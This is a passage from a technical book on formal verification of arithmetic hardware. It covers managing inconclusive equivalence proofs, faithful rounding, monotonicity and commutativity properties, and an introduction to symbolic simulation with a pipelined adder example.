issues because of the huge gate count of the design. This requires specialized
treatment using path analysis, cutpoints, etc., and the FV team applies those
techniques to close the verification process. Formal guarantees 100% coverage
of the datapath algorithm, which is attractive to everyone involved.
13. Bug hunting
When it is hard to achieve 100% convergence, for example, on very complex
designs such as compression, it is recommended to run formal in bug-hunting
mode. Bug hunting involves taking a dynamic symbolic simulation run to bring
the design state to a certain point and then starting the formal proof from that
state. This allows for deeper bounded testing.
14. Coverage
(a) Case splits coverage
(b) Data space coverage
(c) Assumption coverage
(d) Interesting data cross coverage
15. Regressions
Once an algorithm is proven, it is important to enable a regression setup such that
for every minor change in C++/RTL, testing is automated. This allows the user
to only look at the setup again in case there is a failure in future revisions.
Formal reports only one counterexample at a time rather than pointing out all issues
at once, which follows from the fundamental premise of formal. However, designers
who have been dealing only with simulation may sometimes find this to be a limitation.
Advanced Datapath Verification
Managing Inconclusive Proofs
Given that there are infinitely many logic designs that perform the same function but
a finite number of automated formal verification solvers and strategies, inconclusive
proofs are, at some level of design complexity, inevitable. Designs that once were
conclusive can easily fail to be so once RTL engineers invent novel ways of
optimizing hardware performance. Quality RTL development and improvement
must go hand in hand with encountering and managing inconclusive equivalency
checking proofs.
While there are standard techniques for attempting to overcome these challenges,
such as case splitting, black-boxing, cutpoints, or using different solve scripts,
they provide no guarantee of success. Resolving inconclusive proofs may require
these techniques, but managing inconclusive proofs requires a different approach.
Simulation-based verification gains confidence in its results with every passing
computation; equivalency checking may not, as techniques such as case splitting
will never achieve a proof (unless the input domain is trivial in size). How can
managers force and guarantee progress on inconclusive proofs?
While exhaustive simulation at a bit level typically exceeds years for any
sufficiently valuable datapath design, an approach that reasons at an operator level,
i.e., integer operations, exponentially reduces the problem. Moreover, reasoning at
an operator level matches how RTL designers reason about their implementations.
While case splitting may resolve inconclusiveness, the only guaranteed approach is
for the formal verification engineer (verifier) to dive into the two designs and work
their way toward understanding why the two designs are equivalent. The practical
way to do this is to build a set of equivalent RTLs or system level models from the
specification design S and implementation I:
S ⇐⇒ S1 ⇐⇒ S2 ⇐⇒ · · · ⇐⇒ Sn        Im ⇐⇒ · · · ⇐⇒ I2 ⇐⇒ I1 ⇐⇒ I        (1)
operators into their word level equivalents, etc. This level of white box knowledge
will invariably require input from the creators of S and I or understanding the
algorithms that produced them if auto generated.
This waterfalling approach is intensive but it will provide deep design under-
standing and force the verifier to understand which nature of design rewrites are
provable by the equivalency checker tool. Note that progress is made with every
step, and even the duration of subtasks of this process can be estimated. Ultimately
a point will be reached where the remaining options are of the form:
• Blackbox – use cutpoints to isolate the differing parts of the designs and then
apply case-splitting on that region.
• Extreme Waterfalling – introduce additional intermediate designs with even
smaller axiomatic rewrites.
• Human Sign Off – formal verification is the act of risk mitigation, not elimination;
formal verification tools can return false positives. Time-bound verification
effort may force the verifier to personally sign off on the correctness of a
particular transformation.
• Generate Supporting Evidence – explore other methods to provide evidence,
e.g., reducing the bit width of certain internal variables may provide evidence that
the architecture of the design is correct (this can actually result in a full proof in
certain cases (Shekhar et al. 2008)).
Consider, for example, the transformation

a ∗ b + a ∗ c = Σ_{i=0}^{n−1} 2^i (a_i ∗ b + a_i ∗ c)        (3)
Whether this transformation is or is not provable by a given tool and version
is irrelevant; the verifier must be able to break this kind of transformation down
into smaller axiomatic steps, e.g.:
Note that the right-hand side of Eq. 4 mixes bit and word-level representations
of a and thus provides an intermediate design point for the transformation in Eq. 3.
If Eq. 4 cannot be tool proven, this transformation can be further broken down into
associativity and distributivity properties of multiplication and addition.
The crucial element is the generation of new intermediate steps, and these are the
moments when those managing but not performing formal verification activities can
provide invaluable direction.
In summary, waterfalling, creating multiple intermediate designs, provides a
way to guarantee progress when formally verifying complex datapath designs.
This forces intellectual understanding of the designs as well as of the equivalency
checking tools. This approach comes from basic manager questions: Why is this
hard? What are the differences between these designs? How can this problem be
shrunk? Where are the pain points in this verification? How can they be overcome? These
questions forcibly splinter the problem into its core constituent inconclusive proofs.
Ultimately, they rest on the power of the equivalency tool to perform arbitrary bit
width axiomatic rewrites. Once managers know the limits of the tool’s capability in
this area, they know what is and is not theoretically possible to prove by equivalency
checking. This approach also removes the equivalency tool R&D from the critical
path of any equivalency checking project. Formal verification teams must store
these fundamental inconclusive proof problems, engage with the tool R&D on
their resolution, and find solutions within the verification team before they become
critical.
As formal verification teams working on equivalency checking evolve, they may
even be able to get intermediate designs from the RTL or system level modelers
themselves. Advanced RTL design teams may use waterfalling as part of their RTL
design phase, shrinking design and verification schedules.
While the equivalency tools certainly keep improving, waterfalling provides an
approach to control, focus, and even schedule the work required to overcome highly
complex inconclusive equivalence checking problems.
Accuracy Challenges
regarding algorithm level accuracy. Consider the simplest of fixed point and floating
point designs in Fig. 5.
The left-hand side design is fixed point with a 32-bit fractional datatype used
throughout, denoted 0.32. The right-hand side design is floating point with a single
precision IEEE 754 datatype used throughout, denoted F 32. The most accurate
components that can be created would use round to nearest, ties to even, also known
as correct rounded, for their rounding mode (a full explanation of rounding modes
is provided in Table 1). However, it is worth noting the accuracy of these trivial
designs when using the most accurate components.
For the fixed-point design, consider the following implementation result, where
×̂ denotes the round to nearest, ties to even fixed-point multiplication operation:
Combining two such components has resulted in an error which is nearly 2^−32.
The implementation returns 0.1, whereas a correct rounding of the infinitely precise
result would return 0.011...111. As expected, combining two correctly rounded
components does not result in a correctly rounded result.
For the floating-point design, where +̂ denotes the round to nearest, ties to even
floating-point addition operation:

Implementation: 2^24 +̂ 1 +̂ (−2^24) = 2^24 +̂ (−2^24) = 0        (8)
The infinitely precise result here is 1; more generally, an exact result falls between
two adjacent representable outputs, F1 and F2, and which of the two is returned is
defined by the rounding mode, as shown in Table 1.
One could ask which of these rounding modes should be used for the reference
model or the implementation. Also note that each of these rounding modes will have
a different hardware implementation cost. Moreover, the two round-to-nearest
modes should be more expensive to implement in hardware than the other three, as
their worst-case error is half that of the others. Each of these rounding modes
chooses between F1 and F2; either choice is a legitimate directed rounding. These
five rounding modes are all examples of a faithful rounding, which is defined in
Table 2:
Equivalency checking between the system model and the RTL provides significant
evidence of correctness.
Therefore, in order for RTL designers to make use of the hardware benefits
offered by accuracy optimized components, non-standard verification techniques
need to be employed. Moreover, the only evidence that can be provided of
correctness will come from these non-standard techniques. These techniques use
equivalency checkers to perform Datapath Property Checking.
For verification, reference results under the directed rounding modes RTNI and
RTPI are computed and their values are returned (yRTNI and yRTPI, respectively). The implementation that is
designed to be a faithful rounding (FR Impl) returns yFR . The lemma that should
then be given to the equivalency checker that proves faithful rounding is then in
Eq. 11.
Equivalency checkers are able to prove such properties in practice; in (Drane and
Jain 2012), a double precision floating point multiplier was proven to be faithfully
rounded in under 2 hours on a 1.86 GHz Intel Xeon® machine.
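The shape of such a faithful rounding check can be sketched with plain enumeration standing in for the equivalency checker. The 6-bit fixed-point reciprocal below is an invented toy, not the design of (Drane and Jain 2012), and it satisfies the lemma by construction; a real check would target an independent RTL implementation.

from fractions import Fraction
from math import floor, ceil

FRAC_BITS = 6                              # toy result format: 6 fractional bits
ULP = Fraction(1, 2**FRAC_BITS)

def rtni(v):                               # round toward negative infinity
    return floor(v / ULP) * ULP

def rtpi(v):                               # round toward positive infinity
    return ceil(v / ULP) * ULP

def recip_fr(x):                           # hypothetical faithfully rounded 1/x
    exact = Fraction(1, x)
    return rtni(exact) if x % 2 else rtpi(exact)

for x in range(1, 2**FRAC_BITS):
    exact = Fraction(1, x)
    y = recip_fr(x)
    assert rtni(exact) <= y <= rtpi(exact), x   # the Eq. 11 style lemma
print("faithful rounding lemma holds for all inputs")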
Proving Monotonicity
While faithful rounding has no worse error than the set of directed rounding modes
and can provide significant hardware benefits, it is not enough to prove only the
faithful rounding property. Loosening the accuracy from directed rounding to a
faithful rounding inadvertently runs the risk of violating unspoken assumptions
about arithmetic components. Beyond proving the faithful rounding property, the
verifier will have to consider all arithmetic dangers faithful rounding (or looser
accuracy statements) may introduce, updating specifications and proving additional
properties in the process.
Consider this trivial arithmetic property:

0 < a < b ⇒ 1/b < 1/a    (12)

For single precision inputs just below 2, the two adjacent representable outputs F1 and F2 straddle the exact reciprocals:

F1 = 1/2 + 2^-24 < 1/(2 − 2×2^-23) < 1/(2 − 3×2^-23) < 1/2 + 2^-23 = F2    (14)
Here the reciprocals of 2 − 2×2^-23 and 2 − 3×2^-23 lie between F1 and F2. By
the definition of faithful rounding, one may choose:
a = 2 − 3×2^-23 and recipFR(a) = 1/2 + 2^-24 = F1    (15)

b = 2 − 2×2^-23 and recipFR(b) = 1/2 + 2^-23 = F2    (16)
These assignments result in the situation described in Eq. 13, and recipFR is an
increasing function for these inputs. Faithful rounding thus allows for the creation of
non-monotonic implementations, so monotonicity has to be verified as a property in
its own right, of the form recipFR(NEXT(x)) ≤ recipFR(x),
where recipFR(NEXT(x)) would be a design which first computes the adjacent more
positive input to x and then computes the faithfully rounded reciprocal. Equivalency
checkers are able to prove such properties in practice; in (Drane and Jain 2012),
a single precision floating point reciprocal was proven to be monotonic in under
20 minutes on a 1.86 GHz Intel Xeon® machine.
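The risk itself is easy to exhibit in miniature. The invented faithful reciprocal below, which chooses its rounding direction by input parity, passes the faithful rounding lemma yet is not monotonic, as an exhaustive scan over adjacent inputs shows.

from fractions import Fraction
from math import floor, ceil

F = 6                                        # fractional bits of the toy result

def recip_fr(x):                             # invented faithful 1/x: rounds down
    lo = floor(Fraction(2**F, x))            # for odd x, up for even x
    hi = ceil(Fraction(2**F, x))
    return Fraction(lo if x % 2 else hi, 2**F)

for x in range(1, 2**F - 1):
    if recip_fr(x + 1) > recip_fr(x):        # NEXT(x) yields a larger reciprocal
        print("monotonicity violated at x =", x,
              ":", recip_fr(x), "<", recip_fr(x + 1))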
Proving Commutativity
Unfortunately, faithful rounding can also violate a far more common property,
commutativity. It is possible for multFR(x, y) ≠ multFR(y, x) to occur.
To see how this can happen, consider the following faithful rounding of an unsigned
two-bit multiplication x[1:0] × y[1:0], required to satisfy

RTNI(x×y/4) ≤ multFR(x, y) ≤ RTPI(x×y/4)

and implemented as multFR(x, y) = x[1](y[1] + y[0]), for which

(xy − 3)/4 ≤ x[1](y[1] + y[0]) ≤ (xy + 3)/4    (20)
Equation 20 can be trivially checked to hold for all possible values of x[1:0] and
y[1:0]. The bounds on multFR(x, y) are symmetric in x and y, but this particular
faithful rounding implementation is not. In particular, multFR(2, 1) = 1 whereas
multFR(1, 2) = 0.
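Under the reconstruction of Eq. 20 above, both the bound and the failure of commutativity can be confirmed by exhaustive enumeration; a minimal sketch:

def bit(v, i):
    return (v >> i) & 1

def mult_fr(x, y):                       # the two-bit faithful multiplier
    return bit(x, 1) * (bit(y, 1) + bit(y, 0))

for x in range(4):
    for y in range(4):
        impl = mult_fr(x, y)
        assert x*y - 3 <= 4*impl <= x*y + 3        # Eq. 20, cleared of the /4
        assert x*y // 4 <= impl <= -((-x*y) // 4)  # faithful: RTNI <= impl <= RTPI

pairs = [(x, y) for x in range(4) for y in range(4)
         if mult_fr(x, y) != mult_fr(y, x)]
print("non-commutative pairs:", pairs)   # includes (2, 1) vs (1, 2): 1 vs 0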
References
Drane T, Jain H (2012) Property checking of datapath using word-level formal equivalency tools.
In: Design Automation Conference (DAC) User Track
Shekhar N, Kalla P, Meredith MB, Enescu F (2008) Simulation bounds for equivalence verification
of polynomial datapaths using finite ring algebra. IEEE Trans Very Large Scale Integr (VLSI)
Syst 16(4):376–387
Verification of Arithmetic and Datapath
Circuits with Symbolic Simulation 36
Roope Kaivola and John O’Leary
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1270
Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1270
Symbolic Simulation as Formal Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1271
Symbolic Simulation Among Formal Verification Methods . . . . . . . . . . . . . . . . . . . . . . . . 1272
Chapter Outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1274
Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1275
Booleans and Undefined Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1275
Circuit Simulation and Undefined Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1276
Mathematical Model of Circuit Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1279
Circuit Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1281
Mathematical Model of Circuit Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1282
Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1283
Symbolic Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1283
Simulation with Symbolic Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1284
Mathematical Model of Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1287
Practical Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1288
Simulation Scope Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1289
Property Triggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1289
Scope Reduction by Triggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1293
Reachable-State Invariants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1295
Intel provides these materials as-is, with no express or implied warranties. Intel processors might
contain design defects or errors known as errata, which might cause the product to deviate from
published specifications. Intel, Intel Core, Intel Atom, Pentium and Intel logo are trademarks of
Intel Corporation. Other names and brands might be claimed as the property of others.
Introduction
Symbolic Simulation
Digital circuit simulation is a standard tool in the arsenal of every working logic
design and validation engineer. Symbolic simulation extends this technology with
the ability to carry out a simulation with sets of values in a single simulation
trace, using symbolic representations. This chapter provides a pragmatic high-
level introduction to symbolic simulation and its usage in formal verification of
hardware designs, both at the conceptual level and in practice over the last decades.
Its intended audiences are working validation or formal verification engineers and
validation managers. The chapter also gives a mathematically precise outline of the
foundations of the method.
A traditional circuit simulator takes as its inputs a circuit design and a stimulus
trace assigning values to some or all input nodes of the circuit for given time periods.
The tool simulates the circuit’s behavior with the given stimulus for a required
number of clock cycles and produces a simulation trace, assigning values consistent
with the circuit structure and the stimulus to all the signals in the circuit and all the
time points relevant to the trace. For validation purposes, the simulation trace may
be connected to external checkers probing signals in the trace and observing that
their values are consistent with some external notion of correctness. Alternatively,
the circuit itself may contain embedded checkers, which are evaluated in the natural
course of the simulation.
In a symbolic simulator, the input stimulus may contain symbolic variables in
addition to the traditional concrete Boolean values 0 and 1. These symbolic variables
are effectively names of values, denoting sets of possible concrete values. The
values of the internal signals computed in the simulation are then structural logical
expressions on the symbolic variables on the inputs. For example, in a bit-level
symbolic simulator, a single symbolic variable a corresponds to the set of Boolean
values consisting of both 0 and 1, and if stimulus to a symbolic simulation trace
contains the variables a, b and c, the internal signals might carry values like a ∨ b
or a ∨ (b ∧ ¬c). Section “Symbolic Simulation” provides more thorough examples
of symbolic simulation.
A single symbolic simulation trace corresponds to a set of ordinary simulation
traces, covering behaviors of the simulated circuit for all possible instantiations of
the symbolic variables with concrete values. This universality connects symbolic
simulation to formal verification.
This chapter focuses on discrete bit-level simulation of digital circuits with well-
defined clocks using a zero-delay circuit model. In this model, all combinational
logic gates are computed without any gate delay, and all sequential logic gates, i.e.,
flip-flops and latches, change values instantaneously on clock edges. The model is
at the same time simple and strong enough to capture all logic-level correctness
aspects of circuits.
Symbolic simulation has a unique ability to carve out the circuit logic relevant to the progression of a
pipeline while ignoring the rest of the circuit and other transactions in flight.
As the approach is conceptually simple and concrete, it gives the human verifier a
fine-grained visibility into the progress of the computation during a verification task,
enabling precise analysis and mitigation of computational complexity bottlenecks.
Because of these advantages, symbolic simulation can routinely handle circuits that
are beyond the capacity of traditional model checkers, as well as circuits where the
pipelines are too enmeshed to allow equivalence-based verification. On the other
hand, symbolic simulation is less well suited for verification of general inductive
safety properties, or circuits involving significant feedback loops, as it provides no
automatic mechanism for reachable state analysis, a staple of the traditional formal
model checking methods. Further, liveness properties cannot be directly addressed
by symbolic simulation, as they require reasoning over infinite traces, and symbolic
simulation inherently focuses on finite behaviors.
Symbolic simulation has been the primary vehicle for Intel arithmetic formal
verification for over 20 years. Most arithmetic execution engines of Intel processor
designs over this period have been exhaustively verified using it. While the verifica-
tion of the hardest operations requires great expertise and insight, the overwhelming
majority of arithmetic operations commonly implemented in hardware can be fully
verified with direct symbolic simulation with little user interaction.
Symbolic simulation for circuit verification was introduced in the form of
symbolic trajectory evaluation (STE) by Seger and Bryant (1990, 1995), and the
related methodology was elaborated in more detail in Jones et al. (2001) and Seger
et al. (2005). In this chapter, as well as in actual verification practice, the original
theory of STE is extended by admitting a larger class of properties (Kaivola et al.
2009; O’Leary et al. 2013): all fixed time window properties built with arbitrary
Boolean combinators are covered, whereas STE in its basic form restricts itself to
verification of implications between conjunctions of direct signal references.
Symbolic Simulation Among Formal Verification Methods
Several other technologies address the same problem space as symbolic simulation:
All of these technologies are implemented in a variety of academic tools and the
first two in several commercial ones as well.
Symbolic Simulation and Theorem Proving Both symbolic simulation and the-
orem proving are human-driven, computer-assisted processes. The main difference
is the extent and nature of the human intervention required. Traditional computer-
assisted theorem proving both allows and often requires human guidance over the
minutest details of the verification, and this guidance often reflects the flow of the
theorem prover, not the circuit (cf Russinoff 1998, 2019). Symbolic simulation,
on the other hand, allows users to let automation gloss over many design details,
which is particularly useful in highly optimized bit-level designs. Also, most of
the human guidance can be understood in terms of the flow of information in the
circuit, making the technology more accessible than theorem proving. As discussed
later in the chapter, symbolic simulation can be combined with theorem proving
for problems that exceed the capacity of pure simulation. However, this reasoning
typically takes place at a level of mathematical relations, not at the gate level.
Chapter Outline
Simulation
The most fundamental element of the circuit model used in this chapter is a combi-
national Boolean gate. In modelling these, the usual set of Booleans is extended with
a special undefined value X, denoting lack of information (Definition 1). The value
X means intuitively that it is not known whether a value is 0 or 1. As customary, the
dual of X, the overconstrained value ⊤, is also added. However, ⊤ is rarely used in
verification practice, and we do not discuss it further.
Note that the value X is a modeling abstraction. It refers to knowledge about
a signal value, not to any electrical phenomena that would correspond to a signal
value distinct from 0 or 1. At an underlying concrete level, every signal value at
every time in an actual circuit behavior is expected to be strictly Boolean, either
0 or 1. Common Boolean operators can be naturally extended to cover X values
as depicted in Fig. 1, reflecting the intuition that X denotes an undefined or don’t-
know value. Such extensions are called monotonic (Definition 2). The same concept
is known as X-pessimism in digital circuit literature.
The key feature of the X-abstraction and monotonic extensions is that if a
function is computed using its monotonic extension for an argument list that
contains X’s and the result is a Boolean value of 0 or 1, then the argument X’s
can be replaced with any combination of 0s and 1s, and the result remains the same
(Lemma 1). This gives us the ability to compute the function only once and establish
the result for multiple different concrete arguments. For example, from the single
computation X ∧ 0 = 0, it can be concluded that both 0 ∧ 0 = 0 and 1 ∧ 0 = 0.
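A minimal sketch of such a monotonic extension, with the gates of Fig. 1 lifted to the value set {0, 1, 'X'} (Python is used here purely as illustration):

X = 'X'

def t_not(a):
    return X if a == X else 1 - a

def t_and(a, b):
    if a == 0 or b == 0:
        return 0          # a controlling 0 decides the output, known or not
    if a == X or b == X:
        return X
    return 1

def t_or(a, b):
    if a == 1 or b == 1:
        return 1          # a controlling 1 decides the output
    if a == X or b == X:
        return X
    return 0

print(t_and(X, 0))        # 0: settles the result for both 0 & 0 and 1 & 0
print(t_and(X, 1))        # X: here the unknown input decides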
Definition 1. We write B for the set of Booleans {0, 1}. Let X be the set {0, 1, X, ⊤}
extending B by the undefined value X and the overconstrained value ⊤. We define
the relation ⊑ ⊆ X × X as the minimal relation that satisfies X ⊑ b, b ⊑ b, and
b ⊑ ⊤ for all b ∈ X. If bx ⊑ b, we say that bx abstracts b. For b, b′ ∈ X^k, we write
b ⊑ b′ if bi ⊑ b′i for all i, where b = (b1, …, bk) and b′ = (b′1, …, b′k).
For any sets A1, …, An and functions f, f′ : A1 → … (An → X), we write
f ⊑ f′ if f(a1) … (an) ⊑ f′(a1) … (an) for all (a1, …, an) ∈ A1 × … × An.
Consider the simple pipelined adder circuit in Figs. 2 and 3. The design intent of
the circuit is the computation of 8-bit or 16-bit addition in three pipestages B, C,
and D. Data inputs are read from buses datainB[1] and datainB[2] in pipestage
B, the actual computation takes place a cycle later in pipestage C, and the result
is produced at the output bus sumD another cycle later in pipestage D. The input
valid signal avldB is staged along with the data, and the input control signal add8B
chooses between 8-bit and 16-bit addition. The expected behavior of the circuit add
could be captured by properties such as add8ok in Fig. 4.
The most basic usage model of a traditional simulator in circuit validation is
a single targeted test. The circuit add could be tested by generating stimulus and
checking the response against expected values, as in the trace of Fig. 5.
Fig. 2 Adder circuit schematic
module add( input aclk, avldB, add8B, input [15:0] datainB [2:1],
            output bit avldD, output bit [15:0] sumD ); // header reconstructed from the instantiation in Fig. 13
bit avldC, add8C; bit [15:0] datainC[2:1], mskC, datamskC[2:1], sumrawC, sumC;
`FF( avldC, avldB, aclk ); `FF( add8C, add8B, aclk ); // flop pipestage B->C
`FF( datainC, datainB, aclk );
assign mskC = {{8{~add8C}}, 8'hFF}; // build mask
assign datamskC[1] = mskC & datainC[1]; // mask data
assign datamskC[2] = mskC & datainC[2];
assign sumrawC = datamskC[1] + datamskC[2]; // add masked data
assign sumC = mskC & sumrawC; // mask sum
`FF( avldD, avldC, aclk ); `FF( sumD, sumC, aclk ); // flop pipestage C->D
endmodule
[Fig. 5: a targeted test trace; avldB and add8B asserted in cycle 2 with datainB[1] = h002f and datainB[2] = h0017; response avldD with sumD = h0046 in cycle 4]
We do not formalize the relation between the source code for a circuit and the
mathematical model (in Definition 4 below), expecting the combinational gate
functions, known as the gate excitation functions, to be self-evident monotonic
extensions of common logical constructors, along the lines of Fig. 1. At the level
of digital zero-delay modelling, all types of latches and flip-flops can be expressed
in terms of combinational logic and delay signals, the basic building blocks for the
model.
Circuits are assumed to be powered up in an unconstrained state and initialized
by a reset sequence, typically by asserting a reset signal for some length of time. The
instantaneous state of a circuit execution is modelled by an assignment of values to
circuit signals (Definition 5) and the temporal dynamic behavior of a circuit by a
finite or infinite sequence of states (Definition 6).
By applying the concept of monotonic extensions to the circuit gate functions,
the set of values handled by simulation can be extended with the undefined value X,
allowing stimulus that has Xs in addition to 0s and 1s. Note that an undefined value
X in the stimulus does not mean that the user has not specified the value and the
simulator picks either 0 or 1 randomly. It means that the signal is assigned the special
value X, distinct from 0 and 1, and this value propagates through the gates of the
circuit in the simulation according to rules like those in Fig. 1, resulting in internal
and output values that may be either 0s, 1s, or Xs. Crucially, the monotonicity
property of these rules then guarantees that every output signal that has a 0 or 1
value in the simulation has the same value in every simulation where the stimulus
Xs are replaced with any combination of 0s and 1s. In this way, a single simulation
trace with some undefined stimulus values X corresponds to a set of Boolean traces,
and we gain knowledge about all these concrete traces with the cost of only a single
simulation (Theorem 1).
For example, consider the stimulus and trace in Fig. 6, similar to Fig. 5, except
that the stimulus associates X instead of 0 with signals and times other than the
controls and the 8-bit input data for the main operation of interest. Assume also that
this time, the simulator is started from a state where all state elements are Xs. From
the waveform in Fig. 6, we can conclude that the circuit adds the two given 8-bit
numbers correctly no matter what the preceding or following control or data signal
values were, i.e., that there are no interferences between operations in successive
cycles and that the result of the 8-bit addition operation is not affected by the high-
input data bytes, a stronger statement than in the case of the Boolean simulation
in Fig. 5.
[Fig. 6: the trace of Fig. 5 with X stimulus elsewhere; datainB[1] = hXX2f and datainB[2] = hXX17 in cycle 2; response sumD = h0046 in cycle 4]
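The same conclusion can be reproduced in miniature outside any simulator by pushing the Fig. 6 stimulus through ternary models of the masking logic and a ripple-carry adder; the gate models and least-significant-bit-first ordering below are illustrative choices, not the chapter's tooling.

X = 'X'

def t_and(a, b):
    if a == 0 or b == 0: return 0
    if a == X or b == X: return X
    return 1

def t_or(a, b):
    if a == 1 or b == 1: return 1
    if a == X or b == X: return X
    return 0

def t_xor(a, b):
    return X if X in (a, b) else a ^ b

def ripple_add(xs, ys):                  # ternary full-adder chain, lsb first
    carry, out = 0, []
    for x, y in zip(xs, ys):
        out.append(t_xor(t_xor(x, y), carry))
        carry = t_or(t_and(x, y), t_and(carry, t_xor(x, y)))
    return out

a = [int(c) for c in '00101111'[::-1]] + [X] * 8   # hXX2f, low byte Boolean
b = [int(c) for c in '00010111'[::-1]] + [X] * 8   # hXX17
msk = [1] * 8 + [0] * 8                            # add8 mask, as in Fig. 3
am = [t_and(m, v) for m, v in zip(msk, a)]
bm = [t_and(m, v) for m, v in zip(msk, b)]
sum_masked = [t_and(m, v) for m, v in zip(msk, ripple_add(am, bm))]
print(sum_masked[::-1])   # fully Boolean: h0046, despite the X input bytes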
Definitions 3, 4, 5, and 6 capture the circuit modelling intuition described above. The
model determinism requirement in Definition 5 is used to exclude mathematically
possible models that do not correspond to meaningful circuit designs. Determinism
could be violated, for example, by inconsistent or isolated combinational loops, but
such circuits are not considered well-formed designs in the first place. Theorem 1
then states the basic result that simulation traces computed using undefined values
and monotonic extensions of the gate functions are abstractions of concrete circuit
traces.
Definition 3. We write N for the set of natural numbers {0, 1, …} and [n] for the
set {i ∈ N | i < n} for every n ∈ N. If S is a set and n ∈ N, a finite sequence
of length n over S is a function s : [n] → S, and an infinite sequence over S is
a function s : N → S. We denote the set of all finite sequences over S by S*. If
s ∈ S*, the length of s, denoted len(s), is the value n such that the domain of s is
[n]. If f : A → B is a function, and A′ ⊆ A, we write f|A′ for the restriction of f
to A′, i.e., the function identical to f but restricted to domain A′.
Circuit Properties
Conceptually, circuit properties are predicates that for every trace and every point
of a trace are either true or false at that point. They can be modelled by functions
that map traces to sequences of truth values. A multitude of formalisms exists for
describing circuit properties, for example different temporal logics. In the examples
of this chapter, properties are written as SystemVerilog Assertions (SVA) (IEEE
standard for SystemVerilog–unified hardware design 2018). As with circuits, we
do not formalize the relation between the SVA source code and the mathematical
property, expecting the relation to be self-evident for the common constructors.
Symbolic simulation targets a simple yet very useful set of properties, fixed
time-window invariants, defined as the minimal set that contains all direct signal ref-
erences and is closed under fixed time offsets and Boolean operators (Definition 7).
In traditional linear temporal logic terms, this set coincides with the set of formulas
built from atomic propositions, Boolean operators, and “next-time” and “previous-
time” temporal operators, wrapped in a single “always” operator. The example SVA
properties in this chapter use only direct signal references, Boolean operators, the
“$past” temporal operator, and the overlapping implication operator |−> without a
time delay.
When determining the validity of a property over a circuit, only Boolean traces
are considered, reflecting the intuition that the underlying reality that is modelled
is Boolean and that the use of the undefined value X is a modelling artifact. The
initialization phase of traces is also explicitly ignored: Only states after initialization
count for the validity of a property (Definition 7).
Simulation using the undefined value X allows us to validate a universal invariant
property based on a single instance of it. In other words, if a property holds at one
fixed time with a fixed stimulus trace starting from a maximally undefined state, then
the same property holds in every time point of every trace of the circuit, as long as
the trace agrees with the Boolean 0 and 1 values present in the stimulus (Theorem 2).
Note that it is essential to the argument that the simulation trace validating a property
starts from an unconstrained state. The reset sequence and circuit initialization play
no role in the consideration. The downside of this aspect is that the property is
analyzed over a wider set of behaviors than necessary, including traces that are not
properly initialized.
Returning to the example circuit add in Fig. 3, by iterating over the 2^16 possible
input data values and repeating the simulation in Fig. 6, complete correctness of the
circuit for the 8-bit addition operation could be established, validating the property
add8ok of Fig. 4 at all points of all possible traces of the circuit.
Proof. Take any Boolean trace T′ and t′ ≥ rstlen such that T′, t′ ⊨ char(T). Let
T′′ be the suffix of T′ starting from point t′. Then T′′, 0 ⊨ char(T), implying
stim(T) ⊑ T′′ by Lemma 3. As UND ⊑ start(T′′), then T′′, t ⊨ P by Lemma 2,
hence T′, (t′ + t) ⊨ P and T′, t′ ⊨ P@t.
Symbolic Simulation
Symbolic Computation
[Fig. 7: a sequence of symbolic computations using BDDs, building up the expression a|(b&~c) from the variables a, b, and c]
There are several different techniques for representing symbolic Boolean expres-
sions as graph data structures. The key aspects of any such technique are the size
of the representation and the efficiency of computing the lifted Boolean operations
directly on the representation.
The most traditional approach uses binary decision diagrams (BDDs) (Bryant
1986). Figure 7 contains an example of a sequence of symbolic computations
using BDDs. The great advantage of BDDs is that they provide a canonical
representation, i.e., each possible Boolean function over a set of variables has one
unique representation. On the downside, BDDs require a global ordering of variable
names, and the size of the representation can vary dramatically depending on the
variable ordering applied. Certain logic functions also simply do not have concise
representations as BDDs irrespective of the ordering, for example, arithmetic
multiplication (Bryant 1986).
As an alternative to BDDs, symbolic expressions are also frequently represented
using and-inverter graphs (AIGs) (Kuehlmann et al. 2002) or some similar data
structures (Bjesse and Boralv 2004) that typically allow a more concise representa-
tion at the expense of canonicity.
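The canonicity argument can be illustrated with a deliberately naive stand-in for BDDs: storing each function as its full truth table over a fixed variable order is also canonical, so equality of functions is equality of representations. Real BDDs share subgraphs instead of storing 2^n entries; the sketch below illustrates only the canonicity property.

from itertools import product

VARS = ('a', 'b', 'c')
ASSIGNS = list(product((0, 1), repeat=len(VARS)))

def var(name):                        # a symbolic variable, as a truth table
    i = VARS.index(name)
    return tuple(p[i] for p in ASSIGNS)

def NOT(u):    return tuple(1 - x for x in u)
def AND(u, v): return tuple(x & y for x, y in zip(u, v))
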